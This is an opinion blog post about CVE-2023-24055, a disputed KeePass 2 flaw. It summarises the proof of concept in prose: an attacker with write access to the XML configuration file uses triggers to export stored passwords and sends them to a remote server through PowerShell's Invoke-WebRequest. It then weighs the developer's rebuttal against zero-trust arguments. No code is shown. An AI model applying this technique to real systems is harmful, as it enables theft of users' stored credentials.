CYBERSECURITY
The KeyPass 2 vulnerability argument is getting interesting (CVE-2023-24055)
Phillip Kittelson | 05 Feb 23 |
2 min read
|
Passwords, and the various solutions users take advantage of to secure them, have been increasingly targeted. A vulnerability for KeepPass 2, a popular free and open-source password vault, was recently release with a proof-of-concept (POC) posted in GitHub by security researcher alt3kx. However, the severity, or the fact the issue is a vulnerability at all has been contested by the KeyPass creator.
The alleged vulnerability claims an attacker with write access to an XML configuration file can use triggers, a feature of KeyPass, to export passwords to an XML file, and then use PowerShell to exfiltrate those passwords to a remote server though the Invoke-WebRequest cmdlet. Alt3kx has code snippets, and screen shots showing exploitation of the vulnerability in the POC.
KeyPass developer, Dominik Reichl, denies the issue as vulnerability since it requires write-access to the config file.
While I have not attempted to verify the vulnerability works, I at least have an opinion on the argument.
Just my Opinion…
I can certainly see the arguments from both sides. The developer is arguing an attacker who has write-access to the config file equals game over from the beginning. This argument does ring true to some extent. An attacker who can physically access a machine is in a better position to compromise the device.
However, this flies in the face of more recent culture changes in cybersecurity, such as implementations of a zero-trust concept. In the days of defense-in-depth, once you were in the network, you were allowed to access just about any resource. Zero-trust shuts this down and requires constant authentication and authorization of user activity across a network.
Even physical access to a device does not automatically grant you access to the data on that device. Full-disk encryption solutions, such as Window’s BitLocker, prevent someone from using a boot disk, like Hiren’s or DART, from resetting admin passwords, or accessing raw data.
The idea of a password manager allowing anyone without the master password to export those passwords, especially to a remote server is completely bonkers. Features, such as the triggers function, which is used as part of this vulnerability, should be protected or encrypted as default. Dominik needs to rectify the issue.
Back... Tags: KeyPass, vulnerability, proof of concept, exploitation, CVE-2023-24055, alt3kx, Dominik Reichl